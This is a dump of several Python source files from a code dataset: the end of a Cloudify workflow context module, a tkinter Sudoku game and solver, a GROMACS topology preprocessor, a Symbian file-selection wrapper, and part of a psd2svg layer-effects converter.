out_func=logs.stdout_event_out)\n\n def download_deployment_resource(self,\n resource_path,\n target_path=None):\n return self.storage.download_resource(resource_path=resource_path,\n target_path=target_path)\n\n @property\n def scaling_groups(self):\n return self.storage.plan.get('scaling_groups', {})\n\n # resumable workflows operations - not implemented for local\n def get_tasks_graph(self, execution_id, name):\n pass\n\n def update_operation(self, operation_id, state):\n pass\n\n def store_tasks_graph(self, execution_id, name, operations):\n pass\n\n def store_operation(self, graph_id, dependencies,\n id, name, type, parameters, **kwargs):\n pass\n\n def remove_operation(self, operation_id):\n pass\n\n def get_execution(self, execution_id):\n return self.storage.get_execution(execution_id)\n\n\nclass Modification(object):\n\n def __init__(self, workflow_ctx, modification):\n self._raw_modification = modification\n self.workflow_ctx = workflow_ctx\n node_instances = modification.node_instances\n added_raw_nodes = []\n seen_ids = set()\n for instance in node_instances.added_and_related:\n if instance.node_id not in seen_ids:\n added_raw_nodes.append(\n workflow_ctx.get_node(instance.node_id)._node)\n seen_ids.add(instance.node_id)\n\n added_raw_node_instances = node_instances.added_and_related\n self._added = ModificationNodes(self,\n added_raw_nodes,\n added_raw_node_instances)\n\n removed_raw_nodes = []\n seen_ids = set()\n for instance in node_instances.removed_and_related:\n if instance.node_id not in seen_ids:\n removed_raw_nodes.append(\n workflow_ctx.get_node(instance.node_id)._node)\n seen_ids.add(instance.node_id)\n\n removed_raw_node_instances = node_instances.removed_and_related\n self._removed = ModificationNodes(self,\n removed_raw_nodes,\n removed_raw_node_instances)\n\n @property\n def added(self):\n \"\"\"\n :return: Added and related nodes\n :rtype: ModificationNodes\n \"\"\"\n return self._added\n\n @property\n def removed(self):\n \"\"\"\n :return: Removed and related nodes\n :rtype: ModificationNodes\n \"\"\"\n return self._removed\n\n @property\n def id(self):\n return self._raw_modification.id\n\n def finish(self):\n \"\"\"Finish deployment modification process\"\"\"\n self.workflow_ctx.internal.handler.finish_deployment_modification(\n self._raw_modification)\n\n def rollback(self):\n \"\"\"Rollback deployment modification process\"\"\"\n self.workflow_ctx.internal.handler.rollback_deployment_modification(\n self._raw_modification)\n\n\nclass ModificationNodes(WorkflowNodesAndInstancesContainer):\n def __init__(self, modification, raw_nodes, raw_node_instances):\n super(ModificationNodes, self).__init__(\n modification.workflow_ctx,\n raw_nodes,\n raw_node_instances\n )\n\n\nclass WorkflowDeploymentContext(context.DeploymentContext):\n\n def __init__(self, cloudify_context, workflow_ctx):\n super(WorkflowDeploymentContext, self).__init__(cloudify_context)\n self.workflow_ctx = workflow_ctx\n\n def start_modification(self, nodes):\n \"\"\"Start deployment modification process\n\n :param nodes: Modified nodes specification\n :return: Workflow modification wrapper\n :rtype: Modification\n \"\"\"\n handler = self.workflow_ctx.internal.handler\n modification = handler.start_deployment_modification(nodes)\n self.workflow_ctx.refresh_node_instances()\n return modification\n\n def list_started_modifications(self):\n \"\"\"List modifications already started (and not finished)\n\n :return: A list of workflow modification wrappers\n :rtype: list of Modification\n \"\"\"\n handler = self.workflow_ctx.internal.handler\n return handler.list_deployment_modifications(\n DeploymentModificationState.STARTED)\n\n @property\n def scaling_groups(self):\n return self.workflow_ctx.internal.handler.scaling_groups\n\n\ndef task_config(fn=None, **arguments):\n if fn is not None:\n @functools.wraps(fn)\n def wrapper(*args, **kwargs):\n return fn(*args, **kwargs)\n wrapper.workflow_task_config = arguments\n return wrapper\n else:\n def partial_wrapper(func):\n return task_config(func, **arguments)\n return partial_wrapper\n","sub_path":"cloudify/workflows/workflow_context.py","file_name":"workflow_context.py","file_ext":"py","file_size_in_byte":64864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"198176155","text":"from tkinter import *\nfrom tkinter import filedialog\n\nclass SudokuCell(Label):\n '''represents a Sudoku cell'''\n\n def __init__(self,master):\n '''SudokuCell(master) -> SudokuCell\n creates a new blank SudokuCell'''\n Label.__init__(self,master,height=1,width=2,text='',\\\n bg='white',font=('Arial',24))\n self.number = 0 # 0 represents an empty cell\n self.readOnly = False # starts as changeable\n self.highlighted = False # starts unhighlighted\n self.possibles = {1,2,3,4,5,6,7,8,9} # set of possible fills\n # set up listeners\n self.bind('',self.highlight)\n self.bind('',self.change)\n\n def get_cell(self):\n '''SudokoCell.get_cell() -> int\n returns the number in the cell (0 if empty)'''\n return self.number\n\n def is_read_only(self):\n '''SudokuCell.is_read_only() -> boolean\n returns True if the cell is read-only, False if not'''\n return self.readOnly\n\n def is_highlighted(self):\n '''SudokuCell.is_highlighted() -> boolean\n returns True if the cell is highlighted, False if not'''\n return self.highlighted\n\n def set_cell(self,value,readOnly=False):\n '''SudokuCell.set_cell(value,[readonly])\n sets the number in the cell and unhighlights\n readOnly=True sets the cell to be read-only'''\n self.number = value\n self.readOnly = readOnly\n self.unhighlight() # unhighlight the cell after setting it\n # update the cell and check if we created any bad cells\n self.master.update_cells()\n\n def update_cell(self,badCell=False):\n '''SudokuCell.update_cell()\n displays the number in the cell\n displays as:\n empty if its value is 0\n black if user-entered and legal\n gray if read-only and legal\n red when badCell is True'''\n if self.number == 0: # cell is empty\n self['text'] = ''\n else: # cell has a number\n self['text'] = str(self.number) # display the number\n # set the color\n if badCell:\n self['fg'] = 'red'\n elif self.readOnly:\n self['fg'] = 'dim gray'\n else:\n self['fg'] = 'black'\n\n def highlight(self,event):\n '''SudokuCell.highlight(event)\n handler function for mouse click\n highlights the cell if it can be edited (non-read-only)'''\n if not self.readOnly: # only act on non-read-only cells\n self.master.unhighlight_all() # unhighlight any other cells\n self.focus_set() # set the focus so we can capture key presses\n self.highlighted = True\n self['bg'] = 'lightgrey'\n\n def unhighlight(self):\n '''SudokuCell.unhighlight()\n unhighlights the cell (changes background to white)'''\n self.highlighted = False\n self['bg'] = 'white'\n\n def change(self,event):\n '''SudokuCell.change(event)\n handler function for key press\n only works on editable (non-read-only) and highlighted cells\n if a number key was pressed: sets cell to that number\n if a backspace/delete key was pressed: deletes the number'''\n # only act if the cell is editable and highlighted\n if not self.readOnly and self.highlighted:\n if '1' <= event.char <= '9': # number press -- set the cell\n self.set_cell(int(event.char))\n elif event.keysym in ['BackSpace','Delete','KP_Delete']:\n # delete the cell's contents by setting it to 0\n self.set_cell(0)\n\n def set_possibles(self,value):\n '''SudokuCell.set_possibles()\n sets the set of possible fills'''\n self.possibles = value\n\n def get_possibles(self):\n '''SudokuCell.get_possibles()\n gets the set of possible fills'''\n return self.possibles\n \nclass SudokuGrid(Frame):\n '''object for a Sudoku grid'''\n\n def __init__(self,master):\n '''SudokuGrid(master)\n creates a new blank Sudoku grid'''\n # initialize a new Frame\n Frame.__init__(self,master,bg='black')\n self.grid()\n # put in lines between the cells\n # (odd numbered rows and columns in the grid)\n for n in range(1,17,2):\n self.rowconfigure(n,minsize=1)\n self.columnconfigure(n,minsize=1)\n # thicker lines between 3x3 boxes and at the bottom\n self.columnconfigure(5,minsize=3)\n self.columnconfigure(11,minsize=3)\n self.rowconfigure(5,minsize=3)\n self.rowconfigure(11,minsize=3)\n self.rowconfigure(17,minsize=1) # space at the bottom\n # create buttons\n self.buttonFrame = Frame(self,bg='white') # new frame to hold buttons\n Button(self.buttonFrame,text='Load Grid',command=self.load_grid).grid(row=0,column=0)\n Button(self.buttonFrame,text='Save Grid',command=self.save_grid).grid(row=0,column=1)\n Button(self.buttonFrame,text='Solve',command=self.solve).grid(row=0,column=2)\n Button(self.buttonFrame,text='Reset',command=self.reset).grid(row=0,column=3)\n self.buttonFrame.grid(row=18,column=0,columnspan=17)\n # create the cells\n self.cells = {} # set up dictionary for cells\n for row in range(9):\n for column in range(9):\n self.cells[(row,column)] = SudokuCell(self)\n # cells go in even-numbered rows/columns of the grid\n self.cells[(row,column)].grid(row=2*row,column=2*column)\n # set up boxes (the 3x3 regions)\n self.boxes = [] # list to store the boxes\n # boxes start at rows/columns that are multiples of 3\n # each box is a list of 9 cells\n for row in [0,3,6]:\n for column in [0,3,6]:\n boxList = [] # list to store the coordinates of the cells in the box\n # loop over a 3x3 region\n for i in range(3):\n for j in range(3):\n boxList.append((row+i,column+j)) # add box to list\n self.boxes.append(boxList) # add the box to the master list of boxes\n\n def unhighlight_all(self):\n '''SudokuGrid.unhighlight_all()\n unhighlight all the cells in the grid'''\n for cell in self.cells:\n self.cells[cell].unhighlight()\n\n def update_cells(self):\n '''SudokuGrid.update_cells()\n check for good/bad cells and update their color'''\n for row in range(9):\n for column in range(9):\n foundBad = False\n number = self.cells[(row,column)].get_cell()\n if number > 0: # only need to check non-empty cells\n # check all other cells in the same row and column\n for n in range(9):\n if n != column: # look at all other cells in the row\n if self.cells[(row,n)].get_cell() == number:\n foundBad = True\n if n != row: # look at all other cells in the column\n if self.cells[(n,column)].get_cell() == number:\n foundBad = True\n # find box and check other cells in box\n for box in self.boxes:\n if (row,column) in box: # we've got the right box\n # check other cells in box\n for cell in box:\n if cell != (row,column):\n if self.cells[cell].get_cell() == number:\n foundBad = True\n # update the cell\n self.cells[(row,column)].update_cell(foundBad)\n\n def load_grid(self):\n '''SudokuGrid.load_grid()\n loads a Sudoku grid from a file'''\n # get filename using tkinter's open file pop-up\n filename = filedialog.askopenfilename(defaultextension='.txt')\n # make sure they chose a file and didn't click \"cancel\"\n if filename:\n # open the file and read rows into a list\n sudokufile = open(filename,'r')\n rowList = sudokufile.readlines()\n sudokufile.close()\n # process file data\n for row in range(9):\n for column in range(9):\n # get column'th character from line row\n value = int(rowList[row][column])\n # set the cell\n # if value is nonzero, cell is read-only\n self.cells[(row,column)].set_cell(value, value != 0)\n\n def save_grid(self):\n '''SudokuGrid.save_grid()\n saves the Sudoku grid to a file'''\n # get filename using tkinter's save file pop-up\n filename = filedialog.asksaveasfilename(defaultextension='.txt')\n # make sure they chose a file and didn't click \"cancel\"\n if filename:\n sudokufile = open(filename,'w') # open file for writing\n for row in range(9):\n for column in range(9):\n # add cell to file\n sudokufile.write(str(self.cells[(row,column)].get_cell()))\n sudokufile.write('\\n') # new row\n sudokufile.close()\n\n def reset(self):\n '''SudokuGrid.reset()\n clears all non-read-only cells'''\n for cell in self.cells:\n # only clear non-read-only cells\n if not self.cells[cell].is_read_only():\n self.cells[cell].set_cell(0)\n\n def solve(self):\n '''SudokuGrid.solve()\n solves the Sudoku grid (if possible)\n pops up dialog box at the end indicating the solved status'''\n self.reset()\n makingProgress = True\n while makingProgress:\n makingProgress = self.fill_in_no_brainers() or self.fill_in_only_possibles()\n\n def find_box(self,row,column):\n '''SudokuGrid.find_box(row,column) -> list\n given cell coordinates, returns the box that the cell is in\n (as a list of coordinates)'''\n for box in self.boxes:\n if (row,column) in box:\n return box\n\n def fill_in_no_brainers(self):\n '''SudokuGrid.fill_in_no_brainers() -> boolean\n fills in all the \"no-brainer\" squares: those squares that can\n take only one possible number\n returns True if any get filled in, False if none get filled in.'''\n makingProgress = False # will get set to True if we fill something\n # set the possibles for each cell\n self.set_possibles()\n # loop through grid\n for row in range(9):\n for column in range(9):\n # only consider blank cells\n if self.cells[(row,column)].get_cell() == 0:\n possibles = self.cells[(row,column)].get_possibles()\n # check if only one number\n if len(possibles) == 1:\n num = possibles.pop() # get the number\n # set the cell\n self.cells[(row,column)].set_cell(num)\n makingProgress = True # we've made progress!\n return makingProgress\n\n def set_possibles(self):\n '''SudokuGrid.set_possibles()\n sets the possibles set for each cell'''\n \n # loop through the grid\n for row in range(9):\n for column in range(9):\n # only consider blank cells\n if self.cells[(row,column)].get_cell() == 0:\n otherNumbers = set() # track other numbers\n for n in range(9): # numbers in row and column\n otherNumbers.add(self.cells[(row,n)].get_cell())\n otherNumbers.add(self.cells[(n,column)].get_cell())\n box = self.find_box(row,column)\n for cell in box: # numbers in box\n otherNumbers.add(self.cells[cell].get_cell())\n # numbers not found are possible\n possibleNumbers = set()\n for num in range(1,10):\n if num not in otherNumbers:\n possibleNumbers.add(num)\n self.cells[(row,column)].set_possibles(possibleNumbers)\n\n def fill_in_only_possibles(self):\n '''SudokuGrid.fill_in_only_possibles() -> boolean\n fills in any cell with only one possible number\n returns True if any get filled in, False if none get filled in'''\n makingProgress = False # will get set to True if we fill something\n # set the possibles for each cell\n self.set_possibles()\n # loop through rows\n for row in range(9):\n # look for a number that's only possible in one square of the row\n for number in range(1,10):\n possibleColumns = []\n for column in range(9):\n # look at possible list for blank cells\n if self.cells[(row,column)].get_cell() == 0 and \\\n number in self.cells[(row,column)].get_possibles():\n possibleColumns.append(column)\n # see if we got only one column\n if len(possibleColumns) == 1:\n # place the number!\n self.cells[(row,possibleColumns[0])].set_cell(number)\n makingProgress = True # we're making progress!\n # update possibles\n self.set_possibles()\n # loop through columns\n for column in range(9):\n # look for a number that's only possible in one square of the column\n for number in range(1,10):\n possibleRows = []\n for row in range(9):\n # look at possible list for blank cells\n if self.cells[(row,column)].get_cell() == 0 and \\\n number in self.cells[(row,column)].get_possibles():\n possibleRows.append(row)\n # see if we got only one column\n if len(possibleRows) == 1:\n # place the number!\n self.cells[(possibleRows[0],column)].set_cell(number)\n makingProgress = True # we're making progress!\n # update possibles\n self.set_possibles()\n # loop through boxes\n for box in self.boxes:\n # look for a number that's only possible in one square of the box\n for number in range(1,10):\n possibleCells = []\n for cell in box:\n # look at possible list for blank cells\n if self.cells[cell].get_cell() == 0 and \\\n number in self.cells[cell].get_possibles():\n possibleCells.append(cell)\n # see if we got only one cell\n if len(possibleCells) == 1:\n # place the number!\n self.cells[possibleCells[0]].set_cell(number)\n makingProgress = True # we're making progress!\n return makingProgress\n\n# main loop for the game\ndef sudoku():\n '''sudoku()\n plays sudoku'''\n root = Tk()\n root.title('Sudoku')\n sg = SudokuGrid(root)\n root.mainloop()\n\nsudoku()","sub_path":"sudoku_tkinter.py","file_name":"sudoku_tkinter.py","file_ext":"py","file_size_in_byte":15438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"70278462","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /opt/miniconda3/envs/gmxbatch/lib/python3.7/site-packages/gmxbatch/topfilter/topologyfilter.py\n# Compiled at: 2020-03-09 07:07:33\n# Size of source mod 2**32: 6109 bytes\nimport warnings\nfrom typing import Tuple, List, Optional, Sequence, Dict\n\nclass ParseError(Exception):\n __doc__ = 'Error raised when a parsing error occurs.'\n\n\nclass TopologyFilter:\n __doc__ = 'Simple preprocessor for GROMACS topology files\\n '\n filename: str\n defines: Dict[(str, List[str])]\n ifdefs: List[Tuple[(str, bool)]]\n section = None\n section: Optional[str]\n handleincludes = True\n handleincludes: bool\n handleifdefs = True\n handleifdefs: bool\n handleempty = True\n handleempty: bool\n\n def __init__(self, filename: str, defines: Optional[Sequence[str]]=None, handleincludes: bool=True, handleifdefs: bool=True, handleempty: bool=True):\n \"\"\"Initialize the preprocessor\n\n :param filename: main file name\n :type filename: str\n :param defines: set of defined macros\n :type defines: set of str\n :param handleincludes: if True, follow #include directives. If False, pass them through\n :type handleincludes: bool\n :param handleifdefs: if True, handle preprocessor conditionals. If False, pass them throgh\n :type handleifdefs: bool\n :param handleempty: if True, hide empty (or pure comment) lines. If False, pass them through\n :type handleempty: bool\n \"\"\"\n self.handleempty = handleempty\n self.handleincludes = handleincludes\n self.handleifdefs = handleifdefs\n self.defines = dict(zip(defines, [[]] * len(defines))) if defines else {}\n self.filename = filename\n self.ifdefs = []\n\n def parse(self, filename: Optional[str]=None):\n \"\"\"Start parsing the file.\n\n This is a generator. Yields the following:\n - stripped line (str),\n - comment (str or None),\n - current section name (str or None),\n - file name (str),\n - line number (int),\n - full line (str)\n\n Empty lines, are not yielded.\n\n #ifdef/#ifndef/#else/#endif lines are only yielded if `self.handleifdefs` is set to False.\n\n #include lines are only yielded if `self.handleincludes` is set to False.\n\n :param filename: the file name to parse. Do not set this by yourself, leave it None\n :type filename: str or None\n \"\"\"\n if filename is None:\n filename = self.filename\n self.ifdefs = []\n self.section = None\n with open(filename, 'rt') as (f):\n for i, line in enumerate(f, start=1):\n try:\n l, *comment = line.split(';', 1)\n comment = None if not comment else comment[0]\n l = l.strip()\n if l.startswith('#ifdef') and self.handleifdefs:\n _, macro = l.split()\n self.ifdefs.append((macro, True))\n else:\n if l.startswith('#ifndef') and self.handleifdefs:\n _, macro = l.split()\n self.ifdefs.append((macro, False))\n else:\n if l.startswith('#else') and self.handleifdefs:\n self.ifdefs[-1] = (\n self.ifdefs[(-1)][0], not self.ifdefs[(-1)][1])\n else:\n if l.startswith('#endif') and self.handleifdefs:\n del self.ifdefs[-1]\n else:\n if l.startswith('#include'):\n if self.handleincludes:\n _, incfilename = l.split()\n if incfilename.startswith('\"'):\n if not (incfilename.endswith('\"') or incfilename.startswith('<') and incfilename.endswith('>')):\n raise ParseError(f\"Invalid #include directive in file {f.name} at line #{i}.\")\n self.parse(incfilename)\n else:\n pass\n if self.ifdefs_allow_reading() or self.handleifdefs or l.startswith('#define'):\n _, macro, *values = l.split()\n self.defines[macro] = values\n else:\n if l.startswith('#undef'):\n _, macro = l.split()\n del self.defines[macro]\n else:\n if l.startswith('#error'):\n _, message = l.split(None, 1)\n raise ParseError(f\"#error directive encountered with message: {message}\")\n else:\n if l.startswith('#warn'):\n directive, message = l.split(None, 1)\n warnings.warn(f\"{directive} directive encountered with message: {message}\")\n else:\n if l.startswith('[') and l.endswith(']'):\n self.section = l[1:-1].strip()\n yield (l, comment, self.section, f.name, i, line)\n else:\n if (l or self).handleempty:\n pass\n else:\n yield (\n l, comment, self.section, f.name, i, line)\n except (ValueError, IndexError):\n raise ParseError(f\"Error in file {filename} on line #{i}: {line}\")\n\n def defined(self, macro: str) -> bool:\n \"\"\"Check if a preprocessor macro is #defined or not\"\"\"\n return macro in self.defines\n\n def ifdefs_allow_reading(self) -> bool:\n \"\"\"Check if the current state of #ifdef and #ifndef clauses allow reading/interpreting or not.\"\"\"\n return all([self.defined(macro) and state or not self.defined(macro) and not state for macro, state in self.ifdefs])","sub_path":"pycfiles/gmxbatch-0.0.2.dev0.linux-x86_64.tar/topologyfilter.cpython-37.py","file_name":"topologyfilter.cpython-37.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"47326124","text":"import imp\r\n_pyfileselect = imp.load_dynamic('_pyfileselect', '\\\\sys\\\\bin\\\\kf__pyfileselect.pyd')\r\ndel imp\r\n\r\nfrom _pyfileselect import videos_path, others_path, sounds_path, simple_sounds_path, rom_root_path, presence_logos_path, phone_memory_root_path\r\nfrom _pyfileselect import mms_background_images_path, memory_card_root_path, memory_card_contacts_path, installs_path\r\nfrom _pyfileselect import images_path, gms_pictures_path, games_path, digital_sounds_path, images_thumbnail_path\r\n\r\nDialogTypeSave = 0\r\nDialogTypeMove = 1\r\nDialogTypeCopy = 2\r\ndef select_file(path=u\"C:\\\\\", title=None):\r\n useDefaultTitle = 0\r\n if title is None:\r\n useDefaultTitle = 1\r\n title = u\"\"\r\n filename = _pyfileselect.select_file(path, title, useDefaultTitle)\r\n if (filename == \"\"):\r\n return None\r\n else:\r\n return unicode(filename)\r\n\r\ndef select_memory(title=None):\r\n useDefaultTitle = 0\r\n if title is None:\r\n useDefaultTitle = 1\r\n title = u\"\"\r\n filename = _pyfileselect.select_memory(title, useDefaultTitle)\r\n if (filename == \"\"):\r\n return None\r\n else:\r\n return unicode(filename)\r\n \r\ndef select_folder(path = u\"C:\\\\\", type=DialogTypeCopy, title=None, rightRoot = None, leftSelect = None):\r\n useDefaultTitle = 0\r\n if title is None:\r\n useDefaultTitle = 1\r\n title = u\"\"\r\n useDefaultRight = 0\r\n if rightRoot is None:\r\n useDefaultRight = 1\r\n rightRoot = u\"\"\r\n useDefaultLeft = 0\r\n if leftSelect is None:\r\n useDefaultLeft = 1\r\n leftSelect = u\"\"\r\n folder = _pyfileselect.select_folder(type, path, title, useDefaultTitle, rightRoot, useDefaultRight, leftSelect, useDefaultLeft)\r\n if (folder == \"\"):\r\n return None\r\n else:\r\n return unicode(folder)","sub_path":"pyfileselect2/python/pyfileselect.py","file_name":"pyfileselect.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"176954176","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\nfrom logging import getLogger\nimport numpy as np\nimport svgwrite\nfrom psd_tools.constants import TaggedBlock\nfrom psd_tools.decoder.actions import List, Descriptor\nfrom psd2svg.converter.constants import BLEND_MODE2\nfrom psd2svg.utils.color import cmyk2rgb\n\n\nlogger = getLogger(__name__)\n\n\nclass EffectsConverter(object):\n\n def _get_effects(self, layer):\n blocks = layer._tagged_blocks\n effects = blocks.get(\n b'lfx2', blocks.get(b'lfxs', blocks.get(b'lmfx', None)))\n enabled_effects = {}\n if effects:\n for key, info in effects.descriptor.items:\n if key == b'masterFXSwitch' and not info.value:\n return None\n if isinstance(info, List):\n info = info.items[0]\n if not isinstance(info, Descriptor):\n continue\n items = dict(info.items)\n if not items[b'enab'].value:\n continue\n enabled_effects[key] = items\n return None if len(enabled_effects) == 0 else enabled_effects\n else:\n return None\n\n def _add_effects(self, effects, layer, target, fill_opacity, blend_mode):\n effects_group = self._dwg.g()\n for index in reversed(range(len(target.elements))):\n if isinstance(target.elements[index], svgwrite.base.Title):\n effects_group.elements.append(target.elements.pop(index))\n effects_group['class'] = 'layer-effects'\n effects_group.get_iri()\n\n # TODO: b'ebbl' and multiple effects.\n\n # Outer effects.\n if b'DrSh' in effects:\n effects_group.add(self._add_drsh(\n effects[b'DrSh'], target.get_iri()))\n if b'OrGl' in effects:\n effects_group.add(self._add_orgl(\n effects[b'OrGl'], target.get_iri()))\n\n # TODO: clipped blending option clbl.\n self._add_interior_effects(effects, layer, effects_group, target,\n fill_opacity, blend_mode)\n\n # Stroke effect.\n if b'FrFX' in effects:\n effects_group.add(self._add_frfx(\n effects[b'FrFX'], target.get_iri()))\n\n return effects_group\n\n def _add_interior_effects(self, effects, layer, effects_group, target,\n fill_opacity, blend_mode):\n # Fill effects turns source into mask. Otherwise render.\n mask_iri = None\n if (b'GrFl' in effects or b'SoFi' in effects or\n b'patternFill' in effects):\n self._dwg.defs.add(target)\n use = self._dwg.use(target.get_iri(), opacity=fill_opacity)\n if 'style' in target.attribs:\n use['style'] = target.attribs.pop('style')\n effects_group.add(use)\n mask_iri = self._make_fill_mask(layer, target.get_iri())\n elif fill_opacity < 1.0:\n self._dwg.defs.add(target)\n effects_group.add(self._dwg.use(\n target.get_iri(), opacity=fill_opacity))\n else:\n effects_group.add(target)\n\n if mask_iri:\n if b'patternFill' in effects:\n effects_group.add(self._add_patternfill(\n effects[b'patternFill'], layer, mask_iri, blend_mode))\n if b'GrFl' in effects:\n effects_group.add(self._add_grfl(\n effects[b'GrFl'], layer, mask_iri, blend_mode))\n if b'SoFi' in effects:\n effects_group.add(self._add_sofi(\n effects[b'SoFi'], layer, mask_iri, blend_mode))\n\n # Inner effects.\n if b'IrSh' in effects:\n effects_group.add(self._add_irsh(\n effects[b'IrSh'], target.get_iri(), blend_mode))\n if b'IrGl' in effects:\n effects_group.add(self._add_irgl(\n effects[b'IrGl'], target.get_iri(), blend_mode))\n\n def _make_fill_mask(self, layer, target_iri):\n if not layer.bbox:\n logger.warning('Fill effect to empty layer.')\n return None\n\n mask = self._dwg.defs.add(self._dwg.mask(\n size=(layer.bbox.width, layer.bbox.height)\n ))\n mask['color-interpolation'] = 'sRGB'\n use = mask.add(self._dwg.use(target_iri))\n use['filter'] = self._get_white_filter().get_funciri()\n return mask.get_funciri()\n\n def _add_patternfill(self, items, layer, mask_iri, blend_mode):\n size = (layer.bbox.width, layer.bbox.height)\n pattern = self._make_pattern(items, (layer.bbox.x1, layer.bbox.y1))\n rect = self._dwg.rect(\n size=size,\n insert=(layer.bbox.x1, layer.bbox.y1),\n fill=pattern.get_funciri(), mask=mask_iri)\n rect['class'] = 'layer-effect pattern-fill'\n rect['fill-opacity'] = items[b'Opct'].value / 100.0\n\n if not blend_mode:\n blend_mode = BLEND_MODE2.get(items[b'Md '].value, 'normal')\n if blend_mode != 'normal':\n rect['style'] = 'mix-blend-mode: {}'.format(blend_mode)\n return rect\n\n def _add_grfl(self, items, layer, mask_iri, blend_mode):\n size = (layer.bbox.width, layer.bbox.height)\n grad = self._make_gradient(items, size)\n rect = self._dwg.rect(\n size=size,\n insert=(layer.bbox.x1, layer.bbox.y1),\n fill=grad.get_funciri(), mask=mask_iri)\n rect['class'] = 'layer-effect gradient-fill'\n opacity = items[b'Opct'].value / 100.0\n if opacity != 1.0:\n rect['fill-opacity'] = opacity\n\n if not blend_mode:\n blend_mode = BLEND_MODE2.get(items[b'Md '].value, 'normal')\n if blend_mode != 'normal':\n rect['style'] = 'mix-blend-mode: {}'.format(blend_mode)\n return rect\n\n def _add_sofi(self, items, layer, mask_iri, blend_mode):\n rect = self._dwg.rect(\n size=(layer.bbox.width, layer.bbox.height),\n insert=(layer.bbox.x1, layer.bbox.y1),\n fill=self._get_color_in_item(items), mask=mask_iri)\n rect['class'] = 'layer-effect solid-fill'\n rect['fill-opacity'] = items[b'Opct'].value / 100.0\n\n if not blend_mode:\n blend_mode = BLEND_MODE2.get(items[b'Md '].value, 'normal')\n if blend_mode != 'normal':\n rect['style'] = 'mix-blend-mode: {}'.format(blend_mode)\n return rect\n\n def _add_drsh(self, items, target_iri):\n blur = items[b'blur'].value\n blend_mode = BLEND_MODE2.get(items[b'Md '].value, 'normal')\n\n spread = items[b'Ckmt'].value / 100\n angle = items[b'lagl'].value\n radius = items[b'Dstn'].value\n dx = radius * np.cos(np.radians(angle))\n dy = radius * np.sin(np.radians(angle))\n\n filt = self._dwg.defs.add(self._dwg.filter(\n x='-50%', y='-50%', size=('200%', '200%')))\n filt['class'] = 'drop-shadow'\n filt.feOffset('SourceAlpha', dx=dx, dy=dy, result='drshOffset')\n filt.feGaussianBlur('drshOffset', stdDeviation=blur / 2,\n result='drshBlur')\n transfer = filt.feComponentTransfer('drshBlur', result='drshBlurA')\n transfer.feFuncA('linear', slope=1.0 + 4 * spread, intercept=0.0)\n flood = filt.feFlood(result='drshFlood')\n flood['flood-color'] = self._get_color_in_item(items)\n flood['flood-opacity'] = items[b'Opct'].value / 100.0\n filt.feComposite('drshFlood', in2='drshBlurA', operator='in',\n result='drshShadow')\n\n target = self._dwg.use(target_iri, filter=filt.get_funciri())\n target['class'] = 'layer-effect drop-shadow'\n if blend_mode != 'normal':\n target['style'] = 'mix-blend-mode: {}'.format(blend_mode)\n return target\n\n def _add_orgl(self, items, target_iri):\n blur = items[b'blur'].value\n blend_mode = BLEND_MODE2.get(items[b'Md '].value, 'normal')\n spread = items[b'Ckmt'].value / 100\n\n # Real outer glow needs distance transform.\n filt = self._dwg.defs.add(self._dwg.filter(\n x='-50%', y='-50%', size=('200%', '200%')))\n filt['class'] = 'outer-glow'\n # Saturate alpha mask before glow if non-zero spread.\n if spread > 0:\n transfer = filt.feComponentTransfer('SourceAlpha',\n result='orglAlpha')\n transfer.feFuncA('linear', slope=255, intercept=0.0)\n result = 'orglDilate'\n filt.feMorphology('orglAlpha', radius=blur * spread,\n operator='dilate', result=result)\n else:\n result = 'SourceAlpha'\n filt.feGaussianBlur(\n result, stdDeviation=blur * (1 - spread), result='orglBlur')\n transfer = filt.feComponentTransfer('orglBlur', result='orglBlurA')\n transfer.feFuncA('linear', slope=1 + 4 * spread, intercept=0.0)\n flood = filt.feFlood(result='orglFlood')\n # TODO: Gradient fill\n flood['flood-color'] = color = self._get_color_in_item(items)\n flood['flood-opacity'] = items[b'Opct'].value / 100.0\n filt.feComposite('orglFlood', in2='orglBlurA', operator='in',\n result='orglShadow')\n filt.feComposite('orglShadow', in2='SourceAlpha', operator='out',\n result='orglShadowA')\n\n target = self._dwg.use(target_iri, filter=filt.get_funciri())\n target['class'] = 'layer-effect outer-glow'\n if blend_mode != 'normal':\n target['style'] = 'mix-blend-mode: {}'.format(blend_mode)\n return target\n\n def _add_irsh(self, items, target_iri, blend_mode):\n blur = items[b'blur'].value\n angle = items[b'lagl'].value\n radius = items[b'Dstn'].value\n dx = radius * np.cos(np.radians(angle))\n dy = radius * np.sin(np.radians(angle))\n\n filt = self._dwg.defs.add(self._dwg.filter())\n filt['class'] = 'inner-shadow'\n flood = filt.feFlood(result='irshFlood')\n flood['flood-color'] = color = self._get_color_in_item(items)\n flood['flood-opacity'] = items[b'Opct'].value / 100.0\n filt.feComposite('irshFlood', in2='SourceAlpha', operator='out',\n result='irshShadow')\n filt.feOffset('irshShadow', dx=dx, dy=dy, result='irshOffset')\n filt.feGaussianBlur('irshOffset', stdDeviation=blur / 2,\n result='irshBlur')\n filt.feComposite('irshBlur', in2='SourceAlpha', operator='in',\n result='irshShadow')\n\n target = self._dwg.use(target_iri, filter=filt.get_funciri())\n target['class'] = 'layer-effect inner-shadow'\n if not blend_mode:\n blend_mode = BLEND_MODE2.get(items[b'Md '].value, 'normal')\n if blend_mode != 'normal':\n target['style'] = 'mix-blend-mode: {}'.format(blend_mode)\n return target\n\n def _add_irgl(self, items, target_iri, blend_mode):\n blur = items[b'blur'].value\n spread = items[b'Ckmt'].value / 100\n\n # Real inner glow needs distance transform.\n filt = self._dwg.defs.add(self._dwg.filter())\n filt['class'] = 'inner-glow'\n flood = filt.feFlood(result='irglFlood')\n # TODO: Gradient fill\n flood['flood-color'] = color = self._get_color_in_item(items)\n flood['flood-opacity'] = items[b'Opct'].value / 100.0\n # Saturate alpha mask before glow.\n transfer = filt.feComponentTransfer('SourceAlpha', result='irglAlpha')\n 